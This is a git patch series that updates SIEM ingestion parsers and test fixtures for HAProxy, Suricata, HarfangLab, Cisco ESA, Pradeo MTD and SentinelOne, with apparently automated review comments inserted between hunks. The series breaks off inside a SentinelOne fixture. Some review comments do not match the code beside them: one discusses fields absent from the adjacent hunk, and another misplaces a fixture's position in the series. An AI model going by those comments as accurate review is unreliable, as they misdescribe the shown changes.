a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml index e1f5a3c88..557604c8a 100644 --- a/HAProxy/haproxy/ingest/parser.yml +++ b/HAProxy/haproxy/ingest/parser.yml 
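Review bot: `remotename` is placed in front of `hostname`, so on any event that carries both keys the new value silently replaces what `destination.domain` used to hold, and the diffstat shows no test fixture was added to pin which one wins. If `remotename` is only meant as a fallback, order it last: `destination.domain: "{{parsed_event.message.hostname or parsed_event.message.dhost or parsed_event.message.remotename}}"`. Also add a fixture with a `remotename` event; if that field can carry an IP literal or a peer name rather than a FQDN in some log types (I cannot tell from the hunk), `destination.domain` would then hold a non-domain value that breaks domain-based rules.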
@@ -14,7 +14,7 @@ pipeline: ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9]) HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" TLS_PROTOCOL: "TLS" - HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?' + HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?%{GREEDYDATA}' - name: json filter: "{{grok.message.json_msg | length > 0}}" From b597fe1c7d554917f5fe9b702553d9a03c05a535 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 10 Dec 2024 12:31:20 +0100 Subject: [PATCH 129/150] fix(Suricata): fix smart-description --- Suricata/suricata/_meta/smart-descriptions.json | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json index b330a23c1..432cf533d 100644 --- a/Suricata/suricata/_meta/smart-descriptions.json 
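Review bot: Replacing the `aktci` group with a bare `%{GREEDYDATA}` accepts any trailing content, so a line whose request or TLS suffix is malformed still passes the grok and the remainder vanishes without a trace, and the true-client address that the previous revision at least captured is now dropped entirely. Prefer a named capture such as `%{GREEDYDATA:haproxy_extra}` so unexpected suffixes stay visible, and keep a dedicated `( aktci:\"%{IP:aktci}\")?` in front of it if that value is meant to become `client.ip`. The access4.json fixture from the earlier commit should then assert the extra field rather than its absence.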
+++ b/Suricata/suricata/_meta/smart-descriptions.json @@ -151,8 +151,7 @@ "value": "query" }, { - "field": "action.type", - "value": "dns" + "field": "dns.question.name" } ], "relationships": [ From e6a207c4cb874eac232f7f121382031860ed1ed1 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 14:16:24 +0100 Subject: [PATCH 130/150] Fis on agent.id field for harfanglab --- HarfangLab/harfanglab/ingest/parser.yml | 4 ++++ HarfangLab/harfanglab/tests/threat_critical.json | 1 + HarfangLab/harfanglab/tests/threat_log.json | 1 + 3 files changed, 6 insertions(+) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 5050c7429..96338037d 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -142,6 +142,10 @@ stages: organization.id: "{{json_event.message.tenant}}" url.original: "{{json_event.message.details_url_request.url}}" + - set: + agent.id: "{{json_event.message.agents[0].agent_id}}" + filter: "{{json_event.message.agents | length > 0}}" + network_info: actions: - set: diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json index 94e83a1fd..e9b50e3db 100644 --- a/HarfangLab/harfanglab/tests/threat_critical.json +++ b/HarfangLab/harfanglab/tests/threat_critical.json @@ -10,6 +10,7 @@ "start": "2024-03-19T09:21:00Z" }, "agent": { + "id": "af5e2f63-becd-4660-ade8-30d04c0dd044", "name": "harfanglab" }, "harfanglab": { diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json index dcab41c28..233ffd066 100644 --- a/HarfangLab/harfanglab/tests/threat_log.json +++ b/HarfangLab/harfanglab/tests/threat_log.json @@ -10,6 +10,7 @@ "start": "2024-02-07T15:18:00Z" }, "agent": { + "id": "215fe295-905f-4a8d-8347-e9d438d4e415", "name": "harfanglab" }, "harfanglab": { From 2f1337b090bf6735c1a77376b6fbaa2cb9a4ccf2 Mon Sep 17 00:00:00 2001 
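Review bot: Only `agents[0].agent_id` is mapped, so a threat that involves several endpoints keeps the first agent id and the others are lost from the event, which matters when triage pivots on the agent. Either also expose the full list in a `harfanglab`-namespaced field, or document the truncation next to the new `set`: `# only the first agent is surfaced as agent.id; multi-agent threats are truncated`. The stage containing this `set` starts outside the hunk.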
From: LenaigKaliou Date: Tue, 10 Dec 2024 14:50:41 +0100 Subject: [PATCH 131/150] Fix on cisco.url fields --- Cisco/cisco-esa/_meta/fields.yml | 9 +++++++-- Cisco/cisco-esa/ingest/parser.yml | 11 ++++++++--- .../tests/test_attachments_details.json | 14 ++++++++++---- Cisco/cisco-esa/tests/test_ingest_log2.json | 14 ++++++++++---- Cisco/cisco-esa/tests/test_ingest_log5.json | 19 ++++++++++++++----- Cisco/cisco-esa/tests/test_ingest_log7.json | 5 ++++- 6 files changed, 53 insertions(+), 19 deletions(-) diff --git a/Cisco/cisco-esa/_meta/fields.yml b/Cisco/cisco-esa/_meta/fields.yml index 144a3c222..8adc31e3c 100644 --- a/Cisco/cisco-esa/_meta/fields.yml +++ b/Cisco/cisco-esa/_meta/fields.yml @@ -116,9 +116,14 @@ cisco.esa.status: name: cisco.esa.status type: keyword -cisco.esa.url: +cisco.esa.url.domain: + description: the declaration of the cisco urls domains + name: cisco.esa.url.domain + type: keyword + +cisco.esa.url.full: description: the declaration of the cisco urls - name: cisco.esa.url + name: cisco.esa.url.full type: keyword email.attachments: diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 67b76402f..65e217b47 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml 
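Review bot: Dropping `cisco.esa.url` in favour of `cisco.esa.url.domain` and `cisco.esa.url.full` breaks any saved query or detection rule that filters on the old key, and the diffstat shows no CHANGELOG entry recording the rename. Add a changelog line for the breaking field change, and tighten the descriptions, e.g. `description: domains extracted from every URL found in the message (original and expanded form)` and `description: every URL found in the message, original and expanded form`.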
@@ -209,9 +209,14 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url: >- - [{% for url, details in dict(json_event_url_details.message).items() %} - "{% if details.get('ExpandedUrl') is not none %}{{ details.ExpandedUrl }}{% else %}{{ url }}{% endif %}" + cisco.esa.url.domain: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url.split('/')[2]}}", "{{ details.ExpandedUrl.split('/')[2] }}"{% else %}"{{ url.split('/')[2] }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + cisco.esa.url.full: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} {% if not loop.last %},{% endif %} {% endfor %}] url.domain: "{{parsed_event.message.EAURLDetails}}" diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 56ac98c83..d6a1e2d56 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json @@ -55,10 +55,16 @@ "age": "30 days (or greater)" } }, - "url": [ - "http://schemas.microsoft.com/office/2004/12/omml", - "http://www.w3.org/TR/REC-html40" - ] + "url": { + "domain": [ + "schemas.microsoft.com", + "www.w3.org" + ], + "full": [ + "http://schemas.microsoft.com/office/2004/12/omml", + "http://www.w3.org/TR/REC-html40" + ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index afb99f16d..861934a97 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json 
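Review bot: `url.split('/')[2]` only works for scheme-qualified URLs: the test_ingest_log5 fixture shows `"www.twitter.com"` producing an empty string in `cisco.esa.url.domain`, and an authority such as `host:8443` or `user@host` would be emitted verbatim, so domain-based rules miss exactly the obfuscated links an email gateway log is meant to expose. Derive the host from the authority instead, stripping user-info and port (bracketed IPv6 literals would still need their own handling); the `cisco.esa.url.full` branch is unchanged.
```yaml
cisco.esa.url.domain: >-
  [{% for url, details in json_event_url_details.message.items() %}
  {% set urls = [url, details.ExpandedUrl] if details.get('ExpandedUrl') is not none else [url] %}
  {% for u in urls %}
  {% set authority = u.split('/')[2] if '://' in u else u.split('/')[0] %}
  "{{ authority.split('@')[-1].split(':')[0] }}"{% if not loop.last %}, {% endif %}
  {% endfor %}
  {% if not loop.last %},{% endif %}
  {% endfor %}]
# … unchanged: cisco.esa.url.full …
```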
@@ -58,10 +58,16 @@ "age": "9 years 3 months 14 days" } }, - "url": [ - "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", - "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" - ] + "url": { + "domain": [ + "bce-demo.appc.cisco.com", + "mandrill.appc.cisco.com" + ], + "full": [ + "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", + "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 553425b45..77ae37f04 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -52,11 +52,20 @@ "age": "30 days (or greater)" } }, - "url": [ - "https://facebook.com/u/john.doe", - "https://tiktok.com", - "www.twitter.com" - ] + "url": { + "domain": [ + "", + "facebook.com", + "tiktok.com", + "tinyurl.es" + ], + "full": [ + "https://facebook.com/u/john.doe", + "https://tiktok.com", + "https://tinyurl.es/tbdra", + "www.twitter.com" + ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 29716af19..8fcb871ab 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -55,7 +55,10 @@ "age": "30 days (or greater)" } }, - "url": [] + "url": { + "domain": [], + "full": [] + } } }, "email": { From e927ad7740757db69157c57ffde80af5277eb184 Mon Sep 17 00:00:00 2001 
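Review bot: The test_ingest_log5 expectation pins `""` as the first entry of `cisco.esa.url.domain`, which enshrines the parser's failure on the scheme-less `www.twitter.com` URL rather than catching it. An expected output should not contain an empty domain; fix the extraction so this fixture expects `"www.twitter.com"` in that position.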
From: LenaigKaliou Date: Tue, 10 Dec 2024 15:07:44 +0100 Subject: [PATCH 132/150] Pradeoo: fix on Pradeo MTD parser for application compliance --- Pradeo/pradeo-mtd/ingest/parser.yml | 20 +++---- .../tests/application_compliance_updated.json | 55 +++++++++++++++++++ 2 files changed, 65 insertions(+), 10 deletions(-) create mode 100644 Pradeo/pradeo-mtd/tests/application_compliance_updated.json diff --git a/Pradeo/pradeo-mtd/ingest/parser.yml b/Pradeo/pradeo-mtd/ingest/parser.yml index 239ce01d4..c10d3c444 100644 --- a/Pradeo/pradeo-mtd/ingest/parser.yml +++ b/Pradeo/pradeo-mtd/ingest/parser.yml 
@@ -176,16 +176,16 @@ stages: pradeo.device.mdmId: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.externalId}}" pradeo.device.emm: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.emm}}" pradeo.compliance.matchedResponseRules: "{{json_event.message.content.deviceApplication.compliance.matchedResponseRules}}" - pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.application.id}}" - pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.application.package.package}}" - pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.application.package.system}}" - pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.application.version}}" - pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.application.versionCode}}" - pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.application.name}}" - pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.application.md5}}" - pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.application.sha1}}" - pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.application.sha256}}" - pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.status}}" + pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.id}}" + pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.package}}" + pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.system}}" + pradeo.application.version: 
"{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.version}}" + pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.versionCode}}" + pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.name}}" + pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.md5}}" + pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha1}}" + pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha256}}" + pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.status}}" - filter: '{{json_event.message.type == "DeviceComplianceUpdated"}}' set: event.category: ["process"] diff --git a/Pradeo/pradeo-mtd/tests/application_compliance_updated.json b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json new file mode 100644 index 000000000..916f71473 --- /dev/null +++ b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json 
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n \"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n 
\"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "sekoiaio": { + "intake": { + "dialect": "Pradeo MTD", + "dialect_uuid": "3cedbe29-02f8-42bf-9ec2-0158186c2827" + } + } + }, + "expected": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n 
\"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "event": { + "action": "DeviceApplicationComplianceUpdated", + "category": [ + "process" + ], + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-27T04:10:33.460000Z", + "pradeo": { + "application": { + "id": "azertyuiop", + "md5": "0fccfdefc882c4be6d2a938001184e08", + "name": "App", + "package": "com.app.test", + "sha1": "749c94cd972726ef2b3ccda7e718a2034cc9f6ac", + "sha256": "278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8", + "system": "Android", + "version": "491.0.0.58.78", + "versionCode": "457215664" + }, + "device": { + "byod": false, + "coupled": true, + "declaredModel": "MODEL 01", + "declaredOperatingSystem": "Android", + "declaredOperatingSystemSecurityPatchDate": "2020-09-01T00:00:00Z", + "declaredOperatingSystemVersion": "10.0.0", + "id": "device_id01", + "lastConnection": "2024-11-27T04:07:32Z", + "name": "John", + "serialNumber": "unknown" + }, + "metadata": { + "creationDate": "2024-11-27T04:10:33.460000Z", + "id": "1234567890", + "source": "system", + "type": 
"DeviceApplicationComplianceUpdated" + } + } + } +} \ No newline at end of file From 2e73fb7509b85c32c709f65d816757bc0d89159d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 10 Dec 2024 15:23:16 +0100 Subject: [PATCH 133/150] Update Cisco/cisco-esa/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Cisco/cisco-esa/ingest/parser.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 65e217b47..ea082905c 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -209,12 +209,12 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url.domain: >- + cisco.esa.url_domain: >- [{% for url, details in json_event_url_details.message.items() %} {% if details.get('ExpandedUrl') is not none %}"{{url.split('/')[2]}}", "{{ details.ExpandedUrl.split('/')[2] }}"{% else %}"{{ url.split('/')[2] }}"{% endif %} {% if not loop.last %},{% endif %} {% endfor %}] - cisco.esa.url.full: >- + cisco.esa.url: >- [{% for url, details in json_event_url_details.message.items() %} {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} {% if not loop.last %},{% endif %} From 6335db5a7e01d89222de436ad488b49a3bc3ae93 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Tue, 10 Dec 2024 16:26:06 +0200 Subject: [PATCH 134/150] Fix: SentinelOne smart descriptions --- .../_meta/smart-descriptions.json | 52 ++++++++++ .../tests/process_processcreation_2.json | 96 +++++++++++++++++++ 2 files changed, 148 insertions(+) create mode 100644 SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json 
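Review bot: `cisco.esa.url_domain` still derives each entry with `url.split('/')[2]`, so a URL without a scheme yields an empty string instead of a host — test_ingest_log5.json later in this series expects `""` in `url_domain` for the entry `www.twitter.com`. A guard such as `{% if '//' in url %}"{{ url.split('/')[2] }}"{% else %}"{{ url.split('/')[0] }}"{% endif %}` (and the same for `details.ExpandedUrl`) would keep the list free of empty keywords that match nothing in searches and skew aggregations. The rename itself looks fine; both `>-` templates are complete inside the hunk, but the enclosing `- set:` item begins outside it.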
diff --git a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json index 9a4b1bf43..9acf6e91d 100644 --- a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json +++ b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json @@ -682,6 +682,58 @@ } ] }, + { + "value": "Process {process.command_line} was created by {process.user.name}", + "conditions": [ + { + "field": "event.action", + "value": "Process Creation" + }, + { + "field": "process.user.name" + }, + { + "field": "process.command_line" + } + ], + "relationships": [ + { + "source": "process.user.name", + "target": "process.parent.command_line", + "type": "created" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.title", + "type": "has process title" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "has name" + }, + { + "source": "process.command_line", + "target": "process.title", + "type": "has title" + }, + { + "source": "process.command_line", + "target": "process.name", + "type": "has name" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "created" + }, + { + "source": "process.user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "Process {process.command_line} was created by {user.name}", "conditions": [ diff --git a/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json new file mode 100644 index 000000000..62320459c --- /dev/null +++ b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json 
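Review bot: The `relationships` array of the new entry references `process.parent.command_line`, `process.parent.title` and `process.parent.name`, yet `conditions` only requires `event.action`, `process.user.name` and `process.command_line`, and the fixture added alongside (process_processcreation_2.json) has no `process.parent` fields at all. If the description renderer requires every relationship endpoint to be present, this entry never applies to exactly the events the fixture covers; if it skips missing endpoints, the parent edges are dead weight for those events — either way the intent should be explicit, for example by moving the parent-based edges into a separate entry whose conditions include `{"field": "process.parent.command_line"}`. The edge `{"source": "process.user.name", "target": "process.parent.command_line", "type": "created"}` also attributes creation of the parent to the child's user, which may not be what the underlying data states.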
@@ -0,0 +1,96 @@ +{ + "input": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 
(23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}" + }, + "expected": { + "message": 